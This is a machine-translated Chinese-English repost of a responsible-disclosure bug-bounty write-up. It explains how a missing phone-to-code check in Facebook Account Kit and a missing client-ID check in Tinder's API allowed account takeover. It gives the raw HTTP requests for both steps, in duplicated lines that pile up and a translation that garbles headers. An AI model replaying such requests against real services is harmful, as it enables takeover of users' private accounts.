类似tinder
by AppSecure
通过AppSecure
我如何使用Facebook的Account Kit入侵Tinder帐户并获得了6,250美元的赏金 (How I hacked Tinder accounts using Facebook’s Account Kit and earned $6,250 in bounties)
This is being published with the permission of Facebook under the responsible disclosure policy.
根据负责任的披露政策,此内容已在Facebook的许可下发布。
The vulnerabilities mentioned in this blog post were plugged quickly by the engineering teams of Facebook and Tinder.
Facebook和Tinder的工程团队Swift解决了此博客文章中提到的漏洞。
This post is about an account takeover vulnerability I discovered in Tinder’s application. By exploiting this, an attacker could have gained access to the victim’s Tinder account, who must have used their phone number to log in.
这篇文章是关于我在Tinder应用程序中发现的一个帐户接管漏洞。 通过利用此漏洞,攻击者可以访问受害者的Tinder帐户,该帐户必须使用他们的电话号码登录。
This could have been exploited through a vulnerability in Facebook’s Account Kit, which Facebook has recently addressed.
Facebook帐户套件中的一个漏洞可能已经利用了此漏洞,Facebook 最近已解决了该漏洞。
Both Tinder’s web and mobile applications allow users to use their mobile phone numbers to log into the service. And this login service is provided by Account Kit (Facebook).
Tinder的Web和移动应用程序均允许用户使用其手机号码登录该服务。 并且此登录服务由Account Kit(Facebook)提供。
The user clicks on Login with Phone Number on tinder.com and then they are redirected to Accountkit.com for login. If the authentication is successful then Account Kit passes the access token to Tinder for login.
用户单击tinder.com上的“ 使用电话号码登录”,然后将他们重定向到Accountkit.com进行登录。 如果认证成功,则Account Kit将访问令牌传递给Tinder进行登录。
Interestingly, the Tinder API was not checking the client ID on the token provided by Account Kit.
有趣的是,Tinder API并未检查Account Kit提供的令牌上的客户端ID 。
This enabled the attacker to use any other app’s access token provided by Account Kit to take over the real Tinder accounts of other users.
这使攻击者能够使用Account Kit提供的任何其他应用程序的访问令牌来接管其他用户的真实Tinder帐户。
漏洞描述 (Vulnerability Description)
Account Kit is a product of Facebook that lets people quickly register for and log in to some registered apps by using just their phone numbers or email addresses without needing a password. It is reliable, easy to use, and gives the user a choice about how they want to sign up for apps.
Account Kit是Facebook的产品,它使人们可以仅使用他们的电话号码或电子邮件地址来快速注册并登录某些注册的应用程序,而无需输入密码。 它可靠,易于使用,并为用户提供了有关如何注册应用程序的选择。
Tinder is a location-based mobile app for searching and meeting new people. It allows users to like or dislike other users, and then proceed to a chat if both parties swiped right.
Tinder是一个基于位置的移动应用程序,用于搜索和结识新朋友。 它允许用户喜欢或不喜欢其他用户,然后在双方正确滑动后进行聊天。
There was a vulnerability in Account Kit through which an attacker could have gained access to any user’s Account Kit account just by using their phone number. Once in, the attacker could have gotten ahold of the user’s Account Kit access token present in their cookies (aks).
帐户工具包中存在一个漏洞,攻击者可以通过该漏洞仅通过使用他们的电话号码来访问任何用户的帐户工具包帐户。 一旦进入,攻击者可能已经掌握了其cookie(aks)中存在的用户的Account Kit访问令牌。
After that, the attacker could use the access token (aks) to log into the user’s Tinder account using a vulnerable API.
之后,攻击者可以使用访问令牌(aks)通过易受攻击的API登录用户的Tinder帐户。
我的漏洞利用程序是如何逐步进行的 (How my exploit worked step-by-step)
第1步 (Step 1)
First the attacker would log into victim’s Account Kit account by entering the victim’s phone number in “new_phone_number” in the API request shown below.
首先,攻击者将在下面显示的API请求中的“ new_phone_number ”中输入受害者的电话号码,以登录受害者的Account Kit帐户。
Please note that Account Kit was not verifying the mapping of the phone numbers with their one-time password. The attacker could enter anyone’s phone number and then simply log into the victim’s Account Kit account.
请注意,Account Kit没有验证一次性号码与电话号码的映射。 攻击者可以输入任何人的电话号码,然后简单地登录受害者的Account Kit帐户。
Then the attacker could copy the victim’s “aks” access token of Account Kit app from cookies.
然后,攻击者可以从cookie中复制受害者对Account Kit应用程序的“ aks”访问令牌。
The vulnerable Account Kit API:
易受攻击的Account Kit API:
POST /update/async/phone/confirm/?dpr=2 HTTP/1.1
POST / update / async / phone / confirm /?dpr = 2 HTTP / 1.1
Host: www.accountkit.com
主持人: www.accountkit.com
new_phone_number=[vctim’s phone number]&update_request_code=c1fb2e919bb33a076a7c6fe4a9fbfa97[attacker’s request code]&confirmation_code=258822[attacker’s code]&__user=0&__a=1&__dyn=&__req=6&__be=-1&__pc=PHASED%3ADEFAULT&__rev=3496767&fb_dtsg=&jazoest=
new_phone_number = [vctim的电话号码]&update_request_code = c1fb2e919bb33a076a7c6fe4a9fbfa97 [攻击者的请求代码]&confirmation_code = 258822 [攻击者的代码]&__ user = 0&__ a = 1&__ dyn =&__ req = 6&__ be = && = be = &&& === 3 && === &&& === &&& === 3 && ==
第2步 (Step 2)
Now the attacker simply replays the following request using the copied access token “aks” of victim into the Tinder API below.
现在,攻击者只需使用受害者的复制访问令牌“ aks”,将下面的请求重播到下面的Tinder API中。
They will be logged into the victim’s Tinder account. The attacker would then basically have full control over the victim’s account. They could read private chats, full personal information, and swipe other user’s profiles left or right, among other things.
他们将登录到受害者的Tinder帐户。 然后,攻击者基本上可以完全控制受害者的帐户。 他们可以阅读私人聊天,完整的个人信息,以及向左或向右滑动其他用户的个人资料。
Vulnerable Tinder API:
脆弱的Tinder API:
POST /v2/auth/login/accountkit?locale=en HTTP/1.1
POST / v2 / auth / login / accountkit?locale = zh-CN HTTP / 1.1
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.com
POST / v2 / auth / login / accountkit?locale = zh-CN HTTP / 1.1 主机: api.gotinder.com
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: close
POST / v2 / auth / login / accountkit?locale = zh-CN HTTP / 1.1 主机: api.gotinder.com 连接:关闭
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:关闭 内容长度:185
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.com
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:关闭 内容长度:185 来源: https : //tinder.com
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:close 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000platform: web
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:关闭 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000 平台:网络
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000platform: webUser-Agent: Mozilla/5.0 (Macintosh)
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:close 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000 平台:网络 用户-代理:Mozilla / 5.0(Macintosh)
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000platform: webUser-Agent: Mozilla/5.0 (Macintosh)content-type: application/json
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:close 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000 平台:网络 用户-代理:Mozilla / 5.0(Macintosh) 内容类型:application / json
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000platform: webUser-Agent: Mozilla/5.0 (Macintosh)content-type: application/jsonAccept: */*
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:close 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000 平台:网络 用户-代理:Mozilla / 5.0(Macintosh) 内容类型:application / json 接受:* / *
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000platform: webUser-Agent: Mozilla/5.0 (Macintosh)content-type: application/jsonAccept: */*Referer: https://tinder.com/
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:close 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000 平台:网络 用户-代理:Mozilla / 5.0(Macintosh) 内容类型:application / json 接受:* / * 引用者: https : //tinder.com/
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000platform: webUser-Agent: Mozilla/5.0 (Macintosh)content-type: application/jsonAccept: */*Referer: https://tinder.com/Accept-Encoding: gzip, deflate
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:close 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000 平台:网络 用户-代理:Mozilla / 5.0(Macintosh) 内容类型:application / json 接受:* / * 引用者: https ://tinder.com/接受编码:gzip,deflate
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000platform: webUser-Agent: Mozilla/5.0 (Macintosh)content-type: application/jsonAccept: */*Referer: https://tinder.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:关闭 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000 平台:网络 用户-代理:Mozilla / 5.0(Macintosh) 内容类型:application / json 接受:* / * 引用者: https ://tinder.com/接受编码:gzip,缩小 接受语言:zh-cn,en; q = 0.9
POST /v2/auth/login/accountkit?locale=en HTTP/1.1Host: api.gotinder.comConnection: closeContent-Length: 185Origin: https://tinder.comapp-version: 1000000platform: webUser-Agent: Mozilla/5.0 (Macintosh)content-type: application/jsonAccept: */*Referer: https://tinder.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9{“token”:”xxx”,”id”:””}
POST / v2 / auth / login / accountkit?locale = zh - CN HTTP / 1.1 主机: api.gotinder.com 连接:关闭 内容长度:185 来源: https : //tinder.com 应用程序版本:1000000 平台:网络 用户-代理:Mozilla / 5.0(Macintosh) 内容类型:application / json 接受:* / * 引用者: https ://tinder.com/接受编码:gzip,缩小 接受语言:zh-cn,en; q = 0.9 {“令牌”:“ xxx”,“ id”:“”}}
视频证明 (Video Proof of Concept)
时间线 (Timeline)
Both the vulnerabilities were fixed by Tinder and Facebook quickly. Facebook rewarded me with US $5,000, and Tinder awarded me with $1,250.
这两个漏洞都是由Tinder和Facebook快速修复的。 Facebook奖励我5,000美元,Tinder奖励我1,250美元。
I’m the founder of AppSecure, a specialized cyber security company with years of skill acquired and meticulous expertise. We are here to safeguard your business and critical data from online and offline threats or vulnerabilities.
我是AppSecure的创始人, AppSecure是一家专业的网络安全公司,具有多年的专业技能和专业知识。 我们在这里保护您的业务和关键数据免受在线和离线威胁或漏洞的侵害。
You can contact us at anand.prakash@appsecure.in or sales@appsecure.in.
您可以通过anand.prakash@appsecure.in或sales@appsecure.in与我们联系。
翻译自: https://www.freecodecamp.org/news/hacking-tinder-accounts-using-facebook-accountkit-d5cc813340d1/
类似tinder
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
